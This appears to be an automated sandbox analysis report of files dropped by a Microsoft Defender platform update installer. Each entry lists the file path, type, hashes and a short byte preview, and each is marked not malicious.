Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpWDOScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpWDOScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue> .. </Method>.. </Cmdlet>.. </StaticCmdlets>.. </Class> ..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIleQYJKoZIhvcNAQcCoIIlajCCJWYCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBzAXdbBfjvkCEN -->.. qK7Ym3r0lwef2vQhN9zidTDdkf

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ProtectionManagement.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	775440
Entropy (8bit):	6.117728139036199
Encrypted:	false
SSDEEP:	12288:f73TaRE88QcXW/G1bQXB0UtvcxITEJS22K6iOOODa/uv+7:z3Wt8QcG/G1bohExIAk2f61TG7
MD5:	818FAE33592CC434E3A1271C89F8C58C
SHA1:	83755ABF3F6BC52131FA4E1CE7878138BA2153B5
SHA-256:	5D862F56EDA8E7EFC5591EE0318498320C57CDF8EAE3570ED3A7C233DABE5EFD
SHA-512:	6D33EDA0CFA8946A4C33B8DF6B2C836F72C840D6FC87487B9DDD4071E9011416B213BC6F83F80E9727CFBA6C0A204C75798AFE9C61B5EAD366E74E4F225DD5CF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..c...c...c...(..p...c.....(..y...(..l...(......(..b...(....(.I.b...(..b...Richc...........................PE..d...7y.0.........." ................................................................N.....`A.........................................7.......8.......`..X........S.......%...p...I...<..p...................pR..(... ...@............R......t0.......................text...l........................... ..`.rdata...d.......p..................@..@.data........`.......`..............@....pdata...S.......`..................@..@.didat.......P.......@..............@....rsrc...X....`.......P..............@..@.reloc...I...p...P...`..............@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ProtectionManagement.mof

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	97942
Entropy (8bit):	3.5943941559672163
Encrypted:	false
SSDEEP:	768:ovQJc7QiBhFbJAbYzwyZLvQJc7QiBhFbJAbYzwyZg:/QutyqQutya
MD5:	08358ABE407C2A272148068E693744F0
SHA1:	BE7023281F1B8A5497D992FA07CE6E01C1FFC508
SHA-256:	204DA3BF376AEF0B62441ABEC6E189D7DFC70C28D77102FFD41703F4DCFA646F
SHA-512:	2FF5FECB36D361760495CF5C9C78B4E934B924DA60EC08A6A92331A43016E6616B2FEFF1BF7DAD91522FDD91C6DF1052744E35C7F99C6E173DF1D68C41C065DB
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ProtectionManagement_uninstall.mof

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	C source, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	2664
Entropy (8bit):	3.464075447819169
Encrypted:	false
SSDEEP:	24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzSJjWvlDQzfWvlDQzyWU:eTjDGwJ3SJnr24RFZ7a2la2Sa2mWaWP
MD5:	C4E26C53F76774E091FEE17FFFF64414
SHA1:	5CB3AD07CF6DFF3DB5BAAD55488A769A664BC093
SHA-256:	5172863C41E84024799B2034D42F10E9720FC53171A4F6C1CA2FDB2C6F71DFE9
SHA-512:	635DE182629A248B9BF3061E1A1C1D3ED904B8843187B64CEB3BF96DD4B10769D9E001EAEECED2179350F7012C82317B2C833A8501FF9C92D1A0CE94C711FEBB
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.R.o.l.l.b.a.c.k.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ThirdPartyNotices.txt

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6717
Entropy (8bit):	5.162252158398129
Encrypted:	false
SSDEEP:	96:+WRspYDLPkQHFom1DW4DlHFposoSKYax9gDCk4Cp1PRsQHdBLe:DaVQHFB0AlHISKYoopoQHdxe
MD5:	CE7313760386B6ABDE405F9B9E6EA51D
SHA1:	F969931AC45991F7ECB6767A69433A7082ECCA2F
SHA-256:	73E26404B3571A9E859B3A1144F54C353172479586E0A23C3A7DDA0C1C0AE919
SHA-512:	CF990FC05FD3ED78FF35F1A1ACD5317626D46745BF7E4F8C62AA068A587ABF52F232080464F82692A2BB8C04A4FFA53599B933A4281BC7E697337720DB65BF29
Malicious:	false
Preview:	===============================================================================..1. C++ REST SDK (https://github.com/Microsoft/cpprestsdk).... C++ REST SDK ....The MIT License (MIT)....Copyright (c) Microsoft Corporation....All rights reserved.....Permission is hereby granted, free of charge, to any person obtaining a copy of..this software and associated documentation files (the "Software"), to deal in..the Software without restriction, including without limitation the rights to..use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of..the Software, and to permit persons to whom the Software is furnished to do so,..subject to the following conditions:....The above copyright notice and this permission notice shall be included in all..copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..FITNESS FOR A PARTICULAR PURPO

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\af-ZA\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.0528261738229245
Encrypted:	false
SSDEEP:	384:1LrwfrhpOJs5f9AhVui8c+sEqEKSTGqWSa/WXDBRJENU6y50ZSxR9zus2+lhV:5riPAhfO1PqUB50Zi9zuih
MD5:	4E5123053E05141A5EB63D9A0F42CF73
SHA1:	CE858924D61F80191E88879D51CD3EE55326E68B
SHA-256:	A5C6448D3F01028AA24683BC19DCED26015C99DF387ECD5AD0268134C80F59AB
SHA-512:	301ECDA752150A1DD4352ECDDAD94086E7D73F040CF8DD5689C8D1D1C00DF7FDDCD73221769501C50F951746D0E3E33A92C50BDF0994BC6F476708F70E573182
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...kFb...........!.........X............................................................@.......................................... ...T...........Z...%...........................................................................................rdata..............................@..@.rsrc....T... ...V..................@..@....kFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...O...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\am-ET\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24328
Entropy (8bit):	6.163570071385243
Encrypted:	false
SSDEEP:	384:Nba9HtNfzRKLpPExWUN7W0WVQB8MwnWJD/oxN/pAWSa/WaDBRJu8u2vH3rPR9zuJ:Va9HtNfzRKLpcjZwQkD1Pn3l9zuA+
MD5:	21BE79263C6E56EA0544D065A041F35C
SHA1:	1433522BB2FACD1C34A4B533854EA5F6862EA5E9
SHA-256:	2AE3124C3B9AF7576B60CEB5D65B4066887095F22CC4F971CF385FC9B9C6ACB1
SHA-512:	788630212687034CF27FECAFB65D5A66C7FE71A8D25BBC05A11EE4DFBE1FF502B7C8058247BCF45D21A00CD69F14C3F0D2A109F07AB54156D86047F333DAD9D9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...lFb...........!.........8...............................................`............@.......................................... ..,5...........:...%...........................................................................................rdata..............................@..@.rsrc...,5... ...6..................@..@....lFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..X0...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ar-SA\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60168
Entropy (8bit):	4.8899711940241986
Encrypted:	false
SSDEEP:	768:og0QI4V/O4klevfa7mvqaIzO1BiQZKfEflxZ3wp1Pz7dRmuU9zuk:QgMPP3d8zuk
MD5:	F8F15E8E63DE93C73D3A7F35DED10848
SHA1:	056ECE1B2A2254E4EF8C2D53EEA216A86BE3FACF
SHA-256:	166FA7B8F41F8BC7C5341909DEB69F0E0BF568EE91B0072CD342DBA61FC18D04
SHA-512:	0CD3D6C926B2492241061D96C19197BDD4087DD84572A933E29531D6631AB2B1A18ABBB0D7D413BA92F956CA590C6F7C2EE86CE7C9B67973BAD4C8775825D071
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ar-SA\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27400
Entropy (8bit):	5.6882764569289614
Encrypted:	false
SSDEEP:	384:5Yfz5kWYU1apG2R9U4HUy/HVWR69xlfWSa/WZDBRJvfwBmfWojR9zusw7g3v:iQU1apG2R9UiVWI9xok1PvPfWoF9zu8v
MD5:	6C67B7C4FE2F91C043179A43464A847A
SHA1:	43C1C050307AAC13AC9B218694C9A116EF5013AF
SHA-256:	DFC5DF9E5877D5889534C26643DEC95576FDD15F0E1BECD843B4A4C61324183C
SHA-512:	E6172F70FD9B7457D716E44FFDCB0FB98E523639AC8051D78BF24E7672ACFF3897922EF3251DA84378E7F29551BED2C1A7E628F0EC5108A5116367CE5FA3149D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...mFb...........!.........D...............................................p............@.......................................... ...A...........F...%...........................................................................................rdata..............................@..@.rsrc....A... ...B..................@..@....mFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...<...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\as-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32016
Entropy (8bit):	5.700576446637723
Encrypted:	false
SSDEEP:	768:jbQPaPbPAPOPLTP6PWPkP8Pe1lOO6FD6kKOy6OQOQ4LuYz3KUrZPk//hPrPsSHZG:jblchYJP4pzH
MD5:	D75F773150E7540A1E84DBC62B9353AA
SHA1:	D5BD734FC4EA92525DF6D616B425C3F89B45500D
SHA-256:	B99BC2E8E576C46E63269638C01664C98C705E23438929D62EBBDCC6E4E86D05
SHA-512:	693EC384E3182746680B75327F3C9DF2AB450A9C6853507EC914A024E77C26E44535BDB4C68FD5FB1AED695529F7E32116E4FBEDA2A03F794927F45C667B08E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...oFb...........!.........V............................................................@.......................................... ...S...........X...%...........................................................................................rdata..............................@..@.rsrc....S... ...T..................@..@....oFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..0N...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\az-Latn-AZ\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.336191681213913
Encrypted:	false
SSDEEP:	768:lj1PJ4v3YFcFqFkFJFgFGFYF0Mx6F7aDd1P6adk9zu/:lj1LFcFqFkFJFgFGFYF3x6FW/P4zu/
MD5:	4D00A4FD04A744C53472F613D9FEB0EA
SHA1:	220B2A38FE0C4847A38A3FDCB6748257D3DF0053
SHA-256:	521DB53112E5535A29448CFC248BB2080EF00A2C500294F5A9252FAFA69D4F4A
SHA-512:	ECE748AB2C51C0FAE3624E7D2D13DD20BD3727FF5DD8DB7FCEDFB5D6E9DD14CB61DF72B9924EFECA7810937E0AB670923BBEA1F9CC015D090C843C3743A4FE5F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...qFb...........!.........T......................................................&d....@.......................................... ...Q...........V...%...........................................................................................rdata..............................@..@.rsrc....Q... ...R..................@..@....qFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\bg-BG\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66832
Entropy (8bit):	4.750151277454491
Encrypted:	false
SSDEEP:	768:gBuDOYz0+U0TO/9VqhQGH1P2WF//dj9zg:oYcXqhQGVP2WZzg
MD5:	F9E8E0B8351F5D38E5788DC9F035C29F
SHA1:	C7B6DC52EF9F760B0ACA8D2F1BEFA290170818BB
SHA-256:	4453000A8A45725B2F210755563BBEDECD28678AFB777F991C57DF262D27D0C1
SHA-512:	FB5FC0347328DA11EEED7645C6919D7B376886E45495B026B7B21D7D96F5B8FF956DD6362CD991288579F0D676545D2C2E16DEEAC9179F9E48A1F24323B507D9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\bg-BG\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32016
Entropy (8bit):	5.4341807197933445
Encrypted:	false
SSDEEP:	384:OGJOFGtxhDfmbMpouHuZ332Z3WSa/WrDBRJNXzC/R9zU5tWc:fs+hXpfOwQy1PNXzg9zCsc
MD5:	7473088906E5CF7ACE3CC384CD592519
SHA1:	0D4615B28D406026C76949C524C3C07545A6A6FF
SHA-256:	EC1936E60DE76915D7749EA11F32739924E0A79752013D8EA6183079D1E685E7
SHA-512:	6FC22591BFD16370F5C5824FFFBA87AC706A535314A6A17F6C16654E005FB1959108924605D5829976EE92F7AF2286D1DDE5FBDC43DDC06363F7EB8A4D240756
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...sFb...........!.........V............................................................@.......................................... ...S...........X...%...........................................................................................rdata..............................@..@.rsrc....S... ...T..................@..@....sFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...N...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\bn-IN\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32528
Entropy (8bit):	5.618562813722771
Encrypted:	false
SSDEEP:	768:uX333303MqF6WVHrS3stLXlFwozffQ6SMn6vvvU98/oEp5LWogte1eF3douJ1P67:t64H7ouvP6DozY
MD5:	C865A917635CBB299972AF487D09554B
SHA1:	20694376AF962CA358D58ACA2CA5E19F61755655
SHA-256:	682FA9604783AC9AEE4A487626ADAD7C0DDCC04B9535AD6EF16CF9B2C0237368
SHA-512:	553C10797AB351E93CDB5AF6B407416DB40EA0C5FDCD0082FF4F015925A314EE4A12F55F49B500E160E1EBF758EAC6D937B0AD7701F132219E8BD49A5CDB635A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...tFb...........!.........X......................................................r.....@.......................................... ...U...........Z...%...........................................................................................rdata..............................@..@.rsrc....U... ...V..................@..@....tFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...Q...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\bs-Latn-BA\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30992
Entropy (8bit):	5.1974491570344785
Encrypted:	false
SSDEEP:	384:FONq0HifHAHyuJv3JSFg8Ml/o001rO1gAGmDnoWSa/Wf5DBRJGMXXzC/R9zUIv:FWYuJYY/oVhOqGY51P/XXzg9zPv
MD5:	0D9C0297809D20592AC21A203703AA67
SHA1:	0B10257284385205D51FA4BF487DF17F8B89BF42
SHA-256:	F84DAAE902B2E58BF6CA5BC2940358C523FCD54B57CB76DB406962ADD2843ABE
SHA-512:	1008CE6291C3745D0BD8E796530D6D9105839F1E4E05384ED63AD563B40F903F6089FE5DC0FA257859936A0E70134CE3105066D4C48C1016357458BA0CDF7EA8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...uFb...........!.........R...............................................p.......)....@.......................................... ...N...........T...%...........................................................................................rdata..............................@..@.rsrc....N... ...P..................@..@....uFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ca-ES-valencia\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.068955850455204
Encrypted:	false
SSDEEP:	768:6QBmfwxJvYOmnVmJYlEmnVY4mxYCOAlc5UEsUeYLSSJg94T4OM8i1PCg9zup:6VlY6yPZzup
MD5:	95158246D14FF9A7946C890FCA3834BD
SHA1:	2C4E53DA42C997FAC79BEE143619D4E726D1D3F8
SHA-256:	F07D583976FF2734427AC13B23C5DAAF0A74868E781DD6F42454E6BECBF6061C
SHA-512:	1021CFE60D6975A9DF15B42D6AD5DB37B9C191EFC7E23106720B90A34F9C724E1C51B095282333E6EDFB6C08EB43A214A4BC8DA19E035B74FF4846A2CC0C3943
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...xFb...........!.........X....................................................... ....@.......................................... ...T...........Z...%...........................................................................................rdata..............................@..@.rsrc....T... ...V..................@..@....xFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...P...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ca-ES\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	69896
Entropy (8bit):	4.2648067984070535
Encrypted:	false
SSDEEP:	768:UZH4mcWQ7uhqYxT352UL2dSsq558Vcdyuz9pUJ4cwQRMC20hvQii98+wEH4cdqj9:UUQ17uVc2RMZOhPDzu6
MD5:	7F44D2A53E6B9A90359BDB1F3270994D
SHA1:	5520DFD8B04F4DE25E65B8B6EBACEF1DF752485B
SHA-256:	6DB167C51136D8E235DAB3356DB56AF8D3764B494081008896C393460D1CE25B
SHA-512:	A0AEEFF96A523F576953167B46B15D31B81600B0A60FB3C0E4420304783D0E0D723A809C56AF9A4AD0548756FB52F2A3BBADF6A770F5AB8A3ECDC4A315E95FE1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................."....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ca-ES\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.037611764672926
Encrypted:	false
SSDEEP:	768:+7Db5bipJjCwb+kbsHtIb4H5YmSiMgrNDFWBGWn+YC29HdzMZ8lF1PAfWoF9zua:wT1biDPAf9Xzua
MD5:	F2E82FF440828F4792C84D1B8AE31637
SHA1:	032026761DA3FE46FEDCE79362BB1483109DFA0B
SHA-256:	14888EB1C9824102E013DDF8E53F2BF3A4EB3E541F29574EE8106EDDC4E7A12B
SHA-512:	602C233394C5FD080A10CD6ADFEA987C0D7860433EB8A1CB3BBDD7C5003B5B3CA17ED44CCD32894C7B38946C4C1DAE5EDE75016FFB121D4627E7329EA73A022C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L...vFb...........!.........X.......................................................{....@.......................................... ...U...........Z...%...........................................................................................rdata..............................@..@.rsrc....U... ...V..................@..@....vFb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...P...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\com.microsoft.defender.be.chrome.json

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	4.8011887903612696
Encrypted:	false
SSDEEP:	6:3HWSjKNde/Ott+dmvVnEuLrORVCqwvFFaFlLulkNCB+SrxxLxeNCWHyLIo:L2kO+WnEeMOUlLAjB/1N/0o
